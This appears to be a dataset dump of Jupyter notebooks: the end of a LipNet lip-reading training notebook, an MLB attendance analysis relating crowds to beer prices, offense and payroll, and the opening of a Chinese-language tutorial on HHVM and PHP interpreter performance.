requests>=2.7.0->quandl->-r requirements.txt (line 3)) (3.0.4)\nRequirement already satisfied: urllib3<1.23,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (1.22)\nRequirement already satisfied: idna<2.7,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (2.6)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests>=2.7.0->quandl->-r requirements.txt (line 3)) (2018.11.29)\n/content\n"
],
[
"from MathResearchQHSS.lipreading.io.generator import FrameGenerator\nfrom MathResearchQHSS.lipreading.models import LipNet\nfrom MathResearchQHSS.lipreading.io.io_utils import get_list_IDs\nimport os\nfrom glob import glob\nimport skvideo\n\nold = (75, 576, 720, 3)\nnew = (75, 192, 240,3)\n\ns1_path = '/content/s1/'\ns1_align_path = '/content/s1_align/'\n\n# initializing generators \nlist_IDs = get_list_IDs(s1_path, val_split = 0.8)\ndata_dirs = [s1_path, s1_align_path]\ntrain_gen = FrameGenerator(list_IDs['train'], data_dirs, batch_size = 1, resize_shape = new )\nval_gen = FrameGenerator(list_IDs['val'], data_dirs, batch_size = 1, resize_shape = new)\n# gen.__getitem__(1)",
"_____no_output_____"
],
[
"# quick testing of generators\ninp, out = train_gen.__getitem__(1)\ninp['the_input'].shape",
"/usr/local/lib/python3.6/dist-packages/skimage/transform/_warps.py:84: UserWarning: The default mode, 'constant', will be changed to 'reflect' in skimage 0.15.\n warn(\"The default mode, 'constant', will be changed to 'reflect' in \"\n"
],
[
"# initializing model (takes a while)\nlipnet = LipNet(img_w = new[1], img_h = new[2])\nlipnet.summary()",
"_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nthe_input (InputLayer) (None, 75, 192, 240, 3) 0 \n_________________________________________________________________\nzero1 (ZeroPadding3D) (None, 77, 196, 244, 3) 0 \n_________________________________________________________________\nconv1 (Conv3D) (None, 75, 96, 120, 32) 7232 \n_________________________________________________________________\nmax1 (MaxPooling3D) (None, 75, 48, 60, 32) 0 \n_________________________________________________________________\ndropout_4 (Dropout) (None, 75, 48, 60, 32) 0 \n_________________________________________________________________\nzero2 (ZeroPadding3D) (None, 77, 52, 64, 32) 0 \n_________________________________________________________________\nconv2 (Conv3D) (None, 75, 48, 60, 64) 153664 \n_________________________________________________________________\nmax2 (MaxPooling3D) (None, 75, 24, 30, 64) 0 \n_________________________________________________________________\ndropout_5 (Dropout) (None, 75, 24, 30, 64) 0 \n_________________________________________________________________\nzero3 (ZeroPadding3D) (None, 77, 26, 32, 64) 0 \n_________________________________________________________________\nconv3 (Conv3D) (None, 75, 24, 30, 96) 165984 \n_________________________________________________________________\nmax3 (MaxPooling3D) (None, 75, 12, 15, 96) 0 \n_________________________________________________________________\ndropout_6 (Dropout) (None, 75, 12, 15, 96) 0 \n_________________________________________________________________\ntime_distributed_2 (TimeDist (None, 75, 17280) 0 \n_________________________________________________________________\nbidirectional_3 (Bidirection (None, 75, 512) 26936832 \n_________________________________________________________________\nbidirectional_4 (Bidirection (None, 75, 512) 1181184 \n_________________________________________________________________\ndense1 (Dense) (None, 75, 28) 14364 \n_________________________________________________________________\nsoftmax (Activation) (None, 75, 28) 0 \n=================================================================\nTotal params: 28,459,260\nTrainable params: 28,459,260\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"# compiles model\nfrom keras.optimizers import Adam\nadam = Adam(lr=3e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08)\n\n# the loss calc occurs elsewhere, so use a dummy lambda func for the loss\nlipnet.model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=adam)",
"_____no_output_____"
],
[
"# training \nn_epochs = 20\nmax_queue_size = 1\nlipnet.model.fit_generator(generator = train_gen, epochs = n_epochs, max_queue_size = max_queue_size, workers = 2, use_multiprocessing = True)",
"Epoch 1/200\n"
],
[
"model.save_weights('train_weights_'+str(n_epochs)+'.h5')",
"_____no_output_____"
],
[
"# Adding CLR\n! git clone https://github.com/jchen42703/CLR.git",
"Cloning into 'CLR'...\nremote: Enumerating objects: 247, done.\u001b[K\nremote: Total 247 (delta 0), reused 0 (delta 0), pack-reused 247\u001b[K\nReceiving objects: 100% (247/247), 1.37 MiB | 1.29 MiB/s, done.\nResolving deltas: 100% (86/86), done.\n"
],
[
"# initializing the cyclical learning rate callback\nfrom CLR import clr_callback\nclr = clr_callback.CyclicLR(base_lr=1e-5, max_lr=3e-3, \n step_size=1000., # originally 1000\n mode = 'triangular')\n #mode='exp_range', gamma=0.99994)\ncallbacks = [clr]",
"_____no_output_____"
],
[
"# training \nn_epochs = 20\nmax_queue_size = 1\nlipnet.model.fit_generator(generator = train_gen, epochs = n_epochs, callbacks = callbacks, max_queue_size = max_queue_size, workers = 2, use_multiprocessing = True)",
"Epoch 1/200\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb02f4600256a50d59c64818ee6c35e9f3dd7bcb | 351,509 | ipynb | Jupyter Notebook | What-Drives-MLB Game-Attendance.ipynb | bigbluey/What-Drives-MLB-Game-Attendance | 0b8b17bab213b9571e3728a6022b41cc352312f0 | [
"MIT"
] | null | null | null | What-Drives-MLB Game-Attendance.ipynb | bigbluey/What-Drives-MLB-Game-Attendance | 0b8b17bab213b9571e3728a6022b41cc352312f0 | [
"MIT"
] | null | null | null | What-Drives-MLB Game-Attendance.ipynb | bigbluey/What-Drives-MLB-Game-Attendance | 0b8b17bab213b9571e3728a6022b41cc352312f0 | [
"MIT"
] | null | null | null | 331.299717 | 51,924 | 0.916204 | [
[
[
"# What Drives MLB Game Attendance?",
"_____no_output_____"
],
[
"## Background\n### Find Data\n* Step 1 - Identify and Source Data\n* Step 2 - Perform ETL on the Data:\n * Extract: original data sources and how the data was formatted (CSV, JSON, MySQL, etc).\n * Transform: what data cleaning or transformation was required.\n * Load: the final database, tables/collections, and why this was chosen.\n\n### Data Cleanup & Analysis\n* Document the following:\n * The sources of data that you will extract from.\n * The type of transformation needed for this data (cleaning, joining, filtering, aggregating, etc).\n * The type of final production database to load the data into (relational or non-relational).\n * The final tables or collections that will be used in the production database.\n\n\n## Objectives\n* Variable Set 1 - Game Attendance & Experience 2013 - 2016:\n * Major League Baseball Attendance by Team/Stadium\n * Major League Baseball Beer Prices by Team/Stadium\n\n\n* Variable Set II - Team & Players 2013 - 2016:\n * Major League Baseball Team Offensive Output (Homeruns & RBI's)\n * Major League Baseball Average Player Salary by Team",
"_____no_output_____"
]
],
[
[
"# Import Dependencies\nimport pandas as pd\nimport numpy as np\nimport matplotlib\n%matplotlib inline\nfrom matplotlib import style\nstyle.use('fivethirtyeight')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Python SQL Toolkit and Object Relational Mapper\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, inspect, func\nfrom sqlalchemy.ext.declarative import declarative_base",
"_____no_output_____"
]
],
[
[
"### Store CSV into DataFrame",
"_____no_output_____"
]
],
[
[
"# Files to Load \nbaseball_data_to_load = \"./Resources/baseballdata.csv\"\nmlb_team_data_to_load = \"./Resources/mlb_teams.csv\"\nmlb_beer_price_to_load = \"./Resources/mlb_beer_prices.csv\"\n\n# Read All CSV's\nbaseball_data = pd.read_csv(baseball_data_to_load)\nmlb_team_data = pd.read_csv(mlb_team_data_to_load)\nmlb_beer_price = pd.read_csv(mlb_beer_price_to_load)\n\n# Combine/Merge the DataFrames Into a Single Dataset Based on the Team Names They Share & Year\nmlb_df = pd.merge(baseball_data, mlb_team_data, left_on=[\"Team Name\", \"Year\"], right_on=[\"Team Name\",\"Year\"])\n\n# Display Data Table for Preview\nmlb_df.head()",
"_____no_output_____"
],
[
"# Combine/Merge the 3rd DataFrame With Previously Merged DataFrame \n# Into a Single Dataset Based on the Team Names They Share & Year\ncombined_mlb_df = pd.merge(mlb_beer_price, mlb_df, left_on=[\"Team Name\", \"Year\"], right_on=[\"Team Name\",\"Year\"])\n\n# Display Data Table for Preview\ncombined_mlb_df.head()",
"_____no_output_____"
]
],
[
[
"### Create New Data with Select Columns",
"_____no_output_____"
]
],
[
[
"# Clean DataFrame & Get Only the Data Needed\nnew_combined_mlb_df = combined_mlb_df[[\"Team Name\", \"Year\", \"HR\", \"RBI\", \"salary\", \"PPO\", \"Attendance\"]].copy()\nnew_combined_mlb_df.head()",
"_____no_output_____"
],
[
"# Convert Attendance From String to a Float\nnew_combined_mlb_df.iloc[:,6] = new_combined_mlb_df.iloc[:,6].str.replace(',', '').astype(float)\nnew_combined_mlb_df.head()",
"_____no_output_____"
],
[
"# Import Pandas DataFrame to PostgreSQL\nengine = create_engine(\"postgresql://postgres:password@localhost:5432/baseball_df\")\nupdated_mlb_df.to_sql(\"baseball_df\", engine)",
"_____no_output_____"
],
[
"# Create Engine and Pass in Postgres Connection\n# Setup to Connect to Database \nengine = create_engine(\"postgres://postgres:password@localhost:5432/baseball_df\")\nconn = engine.connect()",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/psycopg2/__init__.py:144: UserWarning: The psycopg2 wheel package will be renamed from release 2.8; in order to keep installing from binary please use \"pip install psycopg2-binary\" instead. For details see: <http://initd.org/psycopg/docs/install.html#binary-install-from-pypi>.\n \"\"\")\n"
],
[
"# Calculate Average Team Attendance From 2013-2016\nattendance_2013 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2013').fetchall()\nattendance_2014 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2014').fetchall()\nattendance_2015 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2015').fetchall()\nattendance_2016 = engine.execute('SELECT \"Team Name\",\"Attendance\" FROM baseball_df WHERE \"Year\"=2016').fetchall()",
"_____no_output_____"
],
[
"# Calculate Average Team Attendance vs. Average Beer Price per Ounce (PPO) for 4 Years\nbeer = pd.read_sql('SELECT \"Team Name\", AVG(\"Attendance\") AS \"Attendance\", AVG(\"PPO\") AS \"PPO\" FROM baseball_df GROUP BY \"Team Name\"', conn)",
"_____no_output_____"
],
[
"# Calculate Average Team Attendance vs. Average HR's + Average RBI's AS Offensive Output for 4 Years\noffense = pd.read_sql('SELECT \"Team Name\", AVG(\"Attendance\") AS \"Attendance\", AVG(\"HR\" + \"RBI\") AS \"Offensive Output\" FROM baseball_df GROUP BY \"Team Name\"', conn)",
"_____no_output_____"
],
[
"# Calculate Average Team Attendance vs. Average Team Salary for 4 Years\nsalary = pd.read_sql('SELECT \"Team Name\", AVG(\"Attendance\") AS \"Attendance\", AVG(\"salary\") AS \"Salary\" FROM baseball_df GROUP BY \"Team Name\"', conn)",
"_____no_output_____"
]
],
[
[
"### Visualizations with Matplotlib",
"_____no_output_____"
]
],
[
[
"# Plot 2013 Attendance Results in a Matplotlib Bar Chart\ndf_2013 = pd.DataFrame(attendance_2013, columns=[\"Team Name\",\"Attendance\"])\ndf_2013.set_index(\"Team Name\", inplace=True)\ndf_2013.plot.bar(title=\"2013 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2013_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Plot 2014 Attendance Results in a Matplotlib Bar Chart\ndf_2014 = pd.DataFrame(attendance_2014, columns=[\"Team Name\",\"Attendance\"])\ndf_2014.set_index(\"Team Name\", inplace=True)\ndf_2014.plot.bar(title=\"2014 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2014_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Plot 2015 Attendance Results in a Matplotlib Bar Chart\ndf_2015 = pd.DataFrame(attendance_2015, columns=[\"Team Name\",\"Attendance\"])\ndf_2015.set_index(\"Team Name\", inplace=True)\ndf_2015.plot.bar(title=\"2015 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2015_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Plot 2016 Attendance Results in a Matplotlib Bar Chart\ndf_2016 = pd.DataFrame(attendance_2016, columns=[\"Team Name\",\"Attendance\"])\ndf_2016.set_index(\"Team Name\", inplace=True)\ndf_2016.plot.bar(title=\"2016 MLB Team Attendance\", figsize=(12,8))\nplt.savefig(\"./Images/2016_MLB_Team_Attendance.png\")\nplt.show()",
"_____no_output_____"
],
[
"# Create Scatterplot with Regression Showing Average Beer Price per Ounce (PPO) vs. Attendance for 4 years\nfig, ax = plt.subplots()\nfig.set_size_inches(12, 8)\nsns.regplot(x=\"PPO\", y=\"Attendance\", data=beer, ax=ax).set_title(\"Attendance vs. Beer Price (2013-2016)\")\nplt.savefig(\"./Images/Attendance_vs_Beer_Price.png\")",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
],
[
"# Create Scatterplot with Regression Showing Average HR's + Average RBI's AS Offensive Output vs. Attendance for 4 Years\nfig, ax = plt.subplots()\nfig.set_size_inches(12, 8)\nsns.regplot(x=\"Offensive Output\", y=\"Attendance\", data=offense, ax=ax).set_title(\"Attendance vs. Offensive Output (2013-2016)\")\nplt.savefig(\"./Images/Attendance_vs_Offensive_Output.png\")\n",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
],
[
"# Create Scatterplot with Regression Showing Average Team Attendance vs. Average Team Salary for 4 Years\nfig, ax = plt.subplots()\nfig.set_size_inches(12, 8)\nsns.regplot(x=\"Salary\", y=\"Attendance\", data=salary, ax=ax).set_title(\"Attendance vs. Salary (2013-2016)\")\nplt.savefig(\"./Images/Attendance_vs_Salary.png\")",
"/Users/josephyon/anaconda3/lib/python3.7/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"### Observations\n* From 2013-2016, MLB team attendance improved for some teams and decreased for others. For example, the St. Louis Cardinals and the Toronto Blue Jays saw an increase in attendance from 2013-2016 while the Oakland A's and Tampa Bay Rays saw decreases. \n* It seems as if lower beer prices did not affect MLB attendance but offensive output, however, affected MLB attendance but only slightly. Beer prices might be lower but fans would rather see more offense.\n* The big correlation was between player salary and attendance. The \"Attendance vs. Salary\" scatterplot indicates that the more a team is willing to spend on players, most likely super stars and/or all-stars, the more willing fans are likely to attend games. ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb0305183cf6930c1e843295ae2c8a04b7c0810f | 82,416 | ipynb | Jupyter Notebook | hhvm_tutorial/index.ipynb | Johnnyxcy/learn-hacklang | 0b7de61c23c600a4be6f047b47f3b359f0dafeec | [
"MIT"
] | 1 | 2022-03-30T00:42:08.000Z | 2022-03-30T00:42:08.000Z | hhvm_tutorial/index.ipynb | Johnnyxcy/learn-hacklang | 0b7de61c23c600a4be6f047b47f3b359f0dafeec | [
"MIT"
] | null | null | null | hhvm_tutorial/index.ipynb | Johnnyxcy/learn-hacklang | 0b7de61c23c600a4be6f047b47f3b359f0dafeec | [
"MIT"
] | null | null | null | 102.763092 | 19,378 | 0.817754 | [
[
[
"# HHVM\n\n## 背景介绍\n\nHHVM 是 Facebook (现 Meta) 开发的高性能 PHP 虚拟机,宣称达到了官方解释器的 9x 性能\n\n### 为什么会有 HHVM\n\n#### 脚本语言\n",
"_____no_output_____"
],
[
"##### Pros\n\n一般我们使用脚本语言 (Perl,Python,PHP,JavaScript)是为了以下几个目的\n\n1. 大部分的脚本语言都拥有较为完备的外部库,能够帮助开发者快速的开发/测试\n\n - 使用 Python 作为 ebt 的技术栈也是因为 `numpy`, `pandas` 等数据科学库的支持比别的编程语言更加的完备\n\n2. 动态语言的特性使得开发过程变得异常轻松,可以最大程度的实现可复用性和多态性,打个比方\n\n - Python\n\n ```python\n def evaluate(model_impl, params):\n return model_impl.calculate(params)\n\n\n class Model(object):\n def calculate(params):\n sum_val = 0\n for param in params:\n sum_val += param\n\n return sum_val\n ```\n\n - C++\n\n ```cpp\n class IModel {\n public:\n virtual double calculate(const vector<double> ¶ms) = 0;\n virtual int calculate(const vector<int> ¶ms) = 0;\n }\n\n class Model : public IModel {\n public:\n double calculate(const vector<double> ¶ms) {\n double sum_val = 0;\n for (vector<double>::iterator it = params.begin(); it != params.end(); ++it) {\n sum_val += *it;\n }\n return sum_val;\n }\n\n int calculate(const vector<int> ¶ms) {\n int sum_val = 0;\n for (vector<int>::iterator it = params.begin(); it != params.end(); ++it) {\n sum_val += *it;\n }\n return sum_val;\n }\n }\n\n double evaluate(IModel* model_impl, const vector<double> ¶ms) {\n return model_impl->calculate(params);\n }\n\n int evaluate(IModel* model_impl, const vector<int> ¶ms) {\n return model_impl->calculate(params);\n }\n ```\n\n - 模版\n\n ```cpp\n // This is ok but template is not a general feature for all static typed language\n template <typename T>\n T evaluate(IModel* model_impl, const vector<T> ¶ms) {\n return model_impl->calculate<T>(params);\n }\n\n template <typename T>\n\n T::value_type evaluate(IModel* model_impl, const T& params) {\n return model_impl->calculate<T>(params);\n }\n ```\n\n3. 动态语言完全是解释执行,调试成本较低。每当改动源码有所改动后,程序重新运行更加直接,只需要解释器重新读取源码即可。编译性语言需要更多的步骤与时间,例如 C++,为了从源码生成可执行程序需要 链接静态库 -> .obj -> 链接动态库 -> 可执行程序。如果是大型项目开发的话这一步骤甚至会花费几个小时。而解释执行的程序可以不需要这些步骤直接重新运行\n",
"_____no_output_____"
],
[
"##### Cons\n\n但是对于有较高性能需求的 situation,编译执行反而会成为拖累。\n\n> Although easy to implement, interpreters are generally slow, which makes scripting language prohibitive for implementing large, CPU-intensive applications. (Zhao, 2021)\n\nDebian 有一个 [benchmark game](https://benchmarksgame-team.pages.debian.net/benchmarksgame/index.html),比较了目前比较常见的几种编程语言的运行速度/内存占用/源码大小",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nbenchmarks = pd.read_csv('./data/programming_language_benchmarks_game_all_measurements.csv')\n\nbenchmarks.head(10)",
"_____no_output_____"
],
[
"compile_lang_lst = ['clang', 'csharpcore', 'csharppgo', 'gcc', 'gfortran', 'go', 'gpp', 'java', 'rust', 'swift']\ninterpreter_lang_lst = ['node', 'perl', 'php', 'python3']\n\ndef boxplot_by_lang(data: pd.DataFrame, colname: str) -> None:\n fig, ax = plt.subplots()\n index = 1\n for lang in compile_lang_lst:\n ax.boxplot(data[data['lang'] == lang][colname],\n positions=[index],\n labels=[lang],\n boxprops=dict(color='blue'))\n index += 1\n\n for lang in interpreter_lang_lst:\n ax.boxplot(data[data['lang'] == lang][colname],\n positions=[index],\n labels=[lang],\n boxprops=dict(color='green'))\n index += 1\n\n ax.set_title(colname, fontsize=15)\n ax.tick_params(axis='x', labelrotation=45)\n fig.set_size_inches(10, 6)",
"_____no_output_____"
],
[
"filtered = benchmarks[(benchmarks['status'] == 0) & (benchmarks['name'] == 'binarytrees') & (benchmarks['n'] == 21)].reset_index()\nboxplot_by_lang(data=filtered, colname='elapsed(s)')",
"_____no_output_____"
],
[
"boxplot_by_lang(data=filtered, colname='mem(KB)')\n",
"_____no_output_____"
],
[
"boxplot_by_lang(data=filtered, colname='size(B)')\n",
"_____no_output_____"
]
],
[
[
"通过以上数据可以显然看出与编译执行语言相比,解释执行的语言在 CPU 的处理性能有明显的优势,部分编译执行的语言在内存处理(申请与回收)上也有着异常优秀的表现。\n\n像 Meta 这样的巨型公司需要 host 的服务器是也是巨型的\n\n\n<img src='./images/faceboook_datacenter_oregon.png' alt='facebook_datacenter' width='1000' />\n\n上图是 Meta 在 Oregon 的数据中心,据说这两个 building 的造价就高达了 *$750M* (约合 *¥47.78 亿*),并且在 2020 年中 Meta 又在边上造了两个\n\n如此巨型的数据中心的一大作用就是用来做 Facebook 的服务器主机,所以为了优化服务器的物理成本,从代码上优化服务器性能是必然的。\n\n我们都知道 Facebook 是用 PHP 实现的,据 HHVM 的项目主持者之一的 Keith Adams 所说,Facebook 有约莫 $2 \\times 10^7$ 行 PHP 代码 (2012年)。Facebook 的开发者在检查之后发现自己服务器的性能问题很大一部分就是资源的消耗就在 PHP 的解释器本身上,所以需要考虑的就是如何优化 PHP 的性能",
"_____no_output_____"
],
[
"### 如何优化 PHP 的性能\n\n1. 使用性能更好的语言重写服务端,如 C++,GO,Java\n - 重构2千万行代码?算了算了\n\n2. 使用 RPC 将部分业务功能独立,减少 PHP 的处理,比如 Twitter 就将自己的很多业务逻辑从 Ruby on Rails 转为了 Java 和 Scala (前端由 node + react 独立实现)\n\n<img src='./images/twitter_tech_stack.webp' alt='twitter_tech_stack' width=\"1000\" />\n\n - RPC 框架 \n <img src='./images/Thrift_homepage.png' alt='Thrift' width=\"1000\" />\n \n 但是不解决问题\n\n\n3. 以动态扩展的形式优化 PHP 的性能瓶颈,用 PHP 加载 C++ 实现的方式绕开性能瓶颈\n - ebt 目前的解决方案,但是对 Facebook 这样历史包袱过重的源码仓库来说,性能瓶颈并不是 1-2 处小地方,而是不断累积的后果,并且 PHP 的扩展并不像 pybind 一样有比较成熟的加载方式\n\n4. 优化 PHP 的解释器本身\n\n\n### 如何优化 PHP 的解释器\n\n1. 改进自己的源码\n - 用 PHP 写的 PHP 性能分析工具 [XHProf](https://github.com/phacility/xhprof)\n - 定位性能瓶颈处,优化代码逻辑,就像 leetcode 去做到 >99%\n - 优化的不够\n\n2. 优化 PHP 的解释器实现\n - [Zend Engine](https://github.com/php/php-src/tree/master/Zend)\n - 将 PHP 编译为 `opcode` 然后执行 `opcode`\n - 优化 Zend 的性能代价太大,并且还要做到版本的向下兼容\n\n3. 将 PHP 转为 C/C++,然后编译生成\n - Hiphop Compiler for PHP (Zhao, 2012)\n\n <img src='./images/hhvm_autogen.png' alt='hhvm_autogen' width=\"1000\" />\n\n 被认为是一种 Ahead of Time 的方式,能够完成非常多的代码优化(就像 LLVM 一样),但是一个问题就是无法正确支持 PHP 中的部分特性,如 `eval()`, `create_function()` 等\n\n > Support for eval is theoretically possible in HipHop by invoking an interpreter. However, we opted not to implement that because the use of eval exposes serious security problems and is therefore discouraged. (Zhao, 2012)\n\n 就像是在 C++ 里面 `Py_Initialize()` 启动了 Python 环境,对内存消耗和代码优化都不是很友好\n\n4. 实现一个虚拟机,将 PHP 源码转为当前平台的机器码执行 (JVM)\n - 如今的 HHVM\n\n\n## HipHop Compiler for PHP (HPHPc)\n\n### C++ 与 PHP 的特性区别\n\n <img src='./images/php_cpp_table.png' alt='PHP_cpp_table' width='600' />\n\n\n### HPHPc 的编译设计\n\n <img src='./images/hphpc_phases.png' alt='hphpc_phases' width='600' />\n\n```php\n<?php\n\ndefine(\"confName\", \"OOPSLA\");\ndefine(\"firstYear\", 1986);\n\nfunction year($edition) {\n return firstYear - 1 + $edition;\n}\n\necho \"Hello \" . confName . \"'\" . year(27);\n```\n\n#### 1. 生成 AST\n\n读取 PHP 的源码并生成对应的 AST\n\n <img src='./images/ast.png' alt='ast' width=\"1000\" />\n\n\n#### 2. 预分析\n\n遍历 AST 并且记录所有符号的信息(类,函数,变量,全局 const),判断哪些符号是存在同名覆盖的情况需要考虑代码上下文。并且建立符号之间的依赖图,为后续的并行优化提供前置准备\n\n#### 3. 预优化\n\n处理不需要类型就能完成的油画,比如将函数转为内联函数,优化不必要的逻辑判断,移除不可能到达的代码片段等\n\n#### 4. 判断类型\n\n核心部分,基于 Damas-Milner constraint-based 算法判断不同符号的类型\n\n<img src='./images/hphpc_types.png' alt='hphpc_types' width=\"600\" />\n\n`variant` 是 `any` 类型,所有符号在类型推断出类型前都是 `variant` 类型,在推断过程中如果成功判断为任何类型则覆盖 `variant`\n\n#### 5. 后优化\n\n在拥有类型之后,HipHop 编译器会根据类型信息优化包括简单的数值计算和逻辑判断在内的部分代码片段,然后再重新执行一次预优化阶段的优化逻辑\n\n#### 6. 生成\n\n最后编译器会遍历带有类型的,被优化后的 AST,并且生成对应的 C++ 代码,并且运行 gcc 编译 C++ 源码,生成的 C++ 部分包括\n\n1. 类的头文件:每个 PHP 的类实现会生成对应的 C++ 头文件与对应的类声明\n2. PHP 的头文件:每个 PHP 的文件(函数)会生成对应的 C++ 头文件与对应的声明\n3. 具体实现文件:包含了一个或者多个声明类/函数的具体实现\n4. 系统文件:不包含 PHP 的源码内容,但是会记录 Symbol Table\n\n### 如何从 AST 生成 C++ 代码\n\n#### 鸭子类型\n\n除了正常标注类型的符号以外,仍然存在无法判断的 `variant` 类型,需要实现一个 `variant` 类型支持运行时处理的逻辑\n\n#### 动态符号\n\n指符号的具体指向需要运行时判断,如\n\n```python\nif SOME_CONDITION:\n x = 10\nelse:\n x = 'a'\n```\n对于这种情况,HipHop 用一张 *global symbol table* 记录了:\n\n - 全局变量\n - 动态申明的 constant\n - 函数体/类实现中的静态变量\n - 重复定义的函数体/类\n\n所谓重复定义是指在不同文件中定义了同样的函数名/类名(在动态语言中这样做是合法的),GST 会在符号名后添加唯一后缀,然后根据具体 `#include` 语句引用的文件名导向不同后缀的同名函数/类实现。对于静态编译过程中出现的无法处理的**动态符号**,HipHop 会通过类似的逻辑生成临时的 *local symbol table*。\n\n在具体处理实际的 variable 时,编译器会通过当前所处的上下文获取 LST 和 GST,从 table 中获取实际的指向。\n\n同时,HipHop 还支持了动态添加实例属性,如",
"_____no_output_____"
]
],
[
[
"class SomeClass:\n\n def __init__(self):\n pass\n\n\nsome_instance = SomeClass()\nsome_instance.a = 10\nprint(some_instance.a)",
"10\n"
]
],
[
[
"为了实现这样的 feature,HipHop 还实现了一个 *property symbol table*,用于记录符号中的属性,当源码尝试访问实例/类属性时,会通过 PST 找到对应的符号。\n\n但是 HPHPc 的痛点就是\n\n- 无法支持 PHP 的动态方法 `eval()`, `create_function()` 等\n- 并且编译后部署上线的源码重量会比 PHP 要大很多,对于2千万行的源码,这种硬性的成本是毁灭性的",
"_____no_output_____"
],
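[
"A rough sketch of the symbol-table idea in Python (the rest of this notebook's code is Python). The names below (`PropertySymbolTable`, `DynamicObject`) are made up purely for illustration and are not HHVM's actual data structures; the point is only that dynamically added attributes are resolved through a per-instance lookup table rather than fixed fields.\n\n```python\n# Conceptual model of a property symbol table (PST) - NOT HHVM's real implementation.\nclass PropertySymbolTable:\n    def __init__(self):\n        self._slots = {}  # attribute name -> stored value\n\n    def set(self, name, value):\n        self._slots[name] = value\n\n    def get(self, name):\n        if name not in self._slots:\n            raise AttributeError('undefined property: ' + name)\n        return self._slots[name]\n\n\nclass DynamicObject:\n    # Models an object whose attributes can be added at runtime.\n    def __init__(self):\n        self.pst = PropertySymbolTable()\n\n\nobj = DynamicObject()\nobj.pst.set('a', 10)      # analogous to `some_instance.a = 10` in the cell above\nprint(obj.pst.get('a'))   # attribute access resolved through the PST -> prints 10\n```",
"_____no_output_____"
],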
[
"## HHVM (HipHop Virtual Machine)\n\n会什么虚拟机能够解决传统解释器的问题呢?\n\n### JIT (Just In Time)\n\nJVM,Numba 和 HHVM 都是对解释性语言的 jit 优化,但是尝试过 Numba 的我们也知道,jit 有可能并没有想象中的那么美好,对于一些简单的方法,jit 甚至还会拖累性能",
"_____no_output_____"
]
],
[
[
"def make_it_double(a: int) -> int:\n return a * 2",
"_____no_output_____"
],
[
"%%timeit\nmake_it_double(10)",
"40.1 ns ± 0.152 ns per loop (mean ± std. dev. of 7 runs, 10,000,000 loops each)\n"
],
[
"import numba\n\nmake_it_double_numba = numba.jit(make_it_double)",
"_____no_output_____"
],
[
"%%timeit\nmake_it_double_numba(10)",
"90.7 ns ± 0.405 ns per loop (mean ± std. dev. of 7 runs, 10,000,000 loops each)\n"
]
],
[
[
